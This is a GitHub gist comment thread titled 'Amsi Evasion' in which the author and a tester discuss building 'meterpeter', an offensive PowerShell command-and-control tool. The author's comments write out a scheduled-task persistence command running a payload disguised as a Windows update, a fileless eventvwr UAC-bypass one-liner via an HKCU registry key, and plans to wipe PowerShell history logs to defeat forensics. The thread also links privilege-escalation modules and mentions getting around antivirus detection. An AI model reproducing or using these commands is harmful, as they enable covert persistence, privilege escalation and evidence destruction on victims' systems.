Skip to content

Instantly share code, notes, and snippets.

@r00t-3xp10it
Created January 6, 2020 22:03
Show Gist options
  • Save r00t-3xp10it/13e1bd5c657a1bd38bdf0a82d0e63309 to your computer and use it in GitHub Desktop.
Save r00t-3xp10it/13e1bd5c657a1bd38bdf0a82d0e63309 to your computer and use it in GitHub Desktop.
Amsi Evasion
Amsi Evasion
@codings9
Copy link

Let me know when I can do video✅💯🔥

@codings9
Copy link

Or more tests✅💯🔥

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 18, 2020

iam current adding a privilege escalation module to it (SDCLT) ..

Remmenber that this bypass technic its only valid for the current process console ..

(If you open another console then AMSI will be active and working)

@codings9
Copy link

codings9 commented Feb 18, 2020

Oh wow, nice ✅💯🔥, thank you, Learning a lot from you thank you!

@r00t-3xp10it
Copy link
Author

you can have the latest version of meterpeter here: https://github.com/r00t-3xp10it/meterpeter

@codings9
Copy link

Cool adding link to Meterpeter vid✅💯🔥

@r00t-3xp10it
Copy link
Author

iam having problems to triger SDCLT priv escal ...
so.. iam going with this one 'enigma_fileless_uac_bypass.rb' that i know it works (tomorrow)...
https://github.com/r00t-3xp10it/msf-auxiliarys/blob/master/windows/local-privilege-escalation/enigma_fileless_uac_bypass.rb

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 18, 2020

Change Remote Files MACE
mace1
setmace


Change Target Desktop Wallpaper ???
next
pwned

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 20, 2020

hey @codings9 look at this one that ive just discorver ... (pure luck) ...

while testing meterpeter [search for passwors in text files] ....
i have notest one file thats storing all commands beeing executed in powershell by meterpeter client or simple by using ps prompt...
LOOK AT THE AMOUNT OF INFO THAT THIS FILE CONTAINS ABOUT PS CONSOLE PROCESS...UAU ..IT AS THE ALL SCRIPT STORED..
busted


"Iam i think to myselft from one forensic prespective" ... BUSTED ...
so... i imediatly reacted to this thread ... by... rewriting the contents of that file in modules like [dellogs] or [listpass] ...
nullfactor

shanty2

🥇

@codings9
Copy link

codings9 commented Feb 20, 2020

Wow, that’s amazing✅💯🔥, so powershell keeps logs?
In ConsoleHost_History-wow great catch

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 20, 2020

note-to-self (priv escal in persistence)

1 - persistence schedule every 10 minuts

schtasks /create /sc minute /mo 10 /tn "taskname" /tr %tmp%\update-KB132645.vbs

schtasks

2 - privilege escalation using filess eventvwr technic

  • a) add hkcu key poiting to client trigger.vbs file
  • b) scheldule start eventvwr every 10 minuts
    • schtasks at restart will start eventvwr, eventvwr starts client trigger.vbs, client starts with SYSTEM privileges .. <- we just need to restart target, start meterpeter listenner to wait for connection ...
New-ItemProperty HKCU\...\trigger-Client.vbs
schtasks .... eventvwr.exe

3 - restart target machine


4 - start meterpeter to recive SYSTEM connection

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 21, 2020

Privilege Escalation in one line (oneliner)

  • 1º - reg add HKCU.. /d 'PS command to start client.ps1'
    'This reg key will auto-elevate to SYSTEM the child process spawned (Client.ps1)' ..
    • 2º - Schedule task to start eventvwr.exe every xx minuts (defined by attacker)
      'This Function allow us to have time to restart meterpeter to recive the connection again from Client'
      • 3º - Restart meterpeter to recive the SYSTEM connection back
        'This function will also alow us to persiste our payload, the diferense its that Client will beacon home from xx to xx minuts compared with the other meterpeter persiste modules'
$Command = "cmd /R REG ADD 'HKCU\Software\Classes\mscfile\shell\open\command' /ve /t REG_SZ /d 'cmd /R powershell -Execution Bypass -w 1 -NoProfile -File %tmp%\Update-KB4524147.ps1';schtasks /create /sc minute /mo $stime /tn `"KB4524147`" /tr `"%windir%\system32\eventvwr.exe`";schtasks /Query /tn `"KB4524147`" `> dellog.txt;write-host "`n`n" `>`> dellog.txt;echo `"   Privilege Escalation beacons every: $stime (minuts)`" `>`> dellog.txt;echo `"   Restart 'meterpeter' to recive the SYSTEM connection.`" `>`> dellog.txt;Get-Content dellog.txt;Remove-Item dellog.txt -Force";

IT DOES NOT WORK: AV FLAGS THIS REGKEY ....

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 23, 2020

Hey @codings9 iam porting meterpeter project to venom ..

i need you to test something for me ...

  • execute in bash terminal
which powershell

And report back if this command checks for powershell install under Linux distros

  • Question: did you required to do chmod +x meterpeter.ps1 ????

@codings9
Copy link

Hey @codings9 iam porting meterpeter project to venom ..

i need you to test something for me ...

execute in bash terminal
which powershell

which powershell does not execute.
To execute powershell in Kali i have to use
pwsh to get the powershell, shell.
And report back if this command checks for powershell install under Linux distros

Question: did you required to do chmod +x meterpeter.ps1 ????
No, Not required under pwsh.
Reference:
https://youtu.be/CmMbWmN246E

@r00t-3xp10it
Copy link
Author

When you execute which powershell in the BASH terminal .. whats the response ???

I dont want to start powershell (which present appl installed full path)

@codings9
Copy link

Nothing here you go:
BB0BB428-032F-4F60-A871-DEEC9C560172

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 23, 2020 via email

@r00t-3xp10it
Copy link
Author

check this locations.

/usr/bin/pwsh
/opt/microsoft/powershell
/usr/local/share/powershell/Modules

@codings9
Copy link

/usr/bin/pwsh

Exists, they reference powershell as pwsh😂🤣

@codings9
Copy link

So we are looking for pwsh not powershell, lol

@codings9
Copy link

which pwsh?
/usr/bin/pwsh

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Feb 24, 2020

exelent ...

which pwsh?
/usr/bin/pwsh

i need to know if venom user was powershell installed before running meterpeter.ps1 .. <--- checking the existence of this folder works fine..
and i need to know if attacker its x64 bits arch (M$ does not give PS to x32 bits) .. <--- already done ..

@codings9
Copy link

Sweet✅💯🔥

@r00t-3xp10it
Copy link
Author

r00t-3xp10it commented Mar 1, 2020

TASK

  • Record 'meterpeter' [Window vs Windows] oficial release video ..

Task Description

hey @codings9 i need your help again ...

To record a video tutorial about 'meterpeter' windows VS Windows  ...
using the 'new terminal windows' configurated to run meterpeter tool ..

New Windows Terminal (M$)

tt



Step-By-Step

  • 1º - Download new meterpeter project (oficial release)
git clone https://github.com/r00t-3xp10it/meterpeter.git

Remenber to change the PATHs to point to your Local meterpeter installation

1º - Create a new GUID for meterpeter tool
     To Creat new GUID visit: http://new-guid.com/

2º - press <'settings'> button in 'new terminal' and copy paste the follow code under
     "profiles":  -> "list":

            },  // <-- REMMENBER TO ADD , IN PREVIOUS CLOSE BRACKLETS FUNCTION ...
                // BEFORE ADDING A NEW FUNCTION TO YOUR PROFILE.JSON FILE

            {
                // Make changes here to the meterpeter profile
                "guid": "{1972e6a7-daef-4cfc-8180-3eecfef9630d}",
                "name": "meterpeter C2",
                "fontFace": "Cascadia Code",
                "backgroundImageStretchMode" : "uniformToFill",
                "backgroundImage" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\darkside.gif",  // <-- Terminal animated background gif Path
                "commandline": "powershell.exe -ExecutionPolicy Bypass -NoLogo -NoExit -File \"%USERPROFILE%\\Desktop\\meterpeter\\meterpeter.ps1\"",    // <-- meterpeter.ps1 script Path
                "startingDirectory" : "%USERPROFILE%\\Desktop\\meterpeter",               // <-- meterpeter folder Path
                "icon" : "%USERPROFILE%\\Desktop\\meterpeter\\mimiRatz\\Alien-icon.png",  // <-- Terminal tab icon Path
                "hidden": false
            }

[i] my profile.json file (Configuration example)

[i] meterpeter WIKI pages

@codings9
Copy link

codings9 commented Mar 1, 2020

Doing the video, just be aware that ps1 file was not downloaded via the bat- i manually moved it to disk and ran it. And Windows picks up the file soon as it touches disk, sample submission off. I had to allow it for the video-I think i understand why Microsoft bought github...now...they have access to all of this...code....Don’t worry will not show on video.

@codings9
Copy link

codings9 commented Mar 1, 2020

The Terminal is amazing love the integration with MeterPeter✅💯🔥

@codings9
Copy link

codings9 commented Mar 2, 2020

@r00t-3xp10it
Copy link
Author

hey thanks ..ive just arrived home ..

@codings9
Copy link

codings9 commented Mar 2, 2020

Lol, no worries anytime...✅💯🔥, thank you!

@r00t-3xp10it
Copy link
Author

👍

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment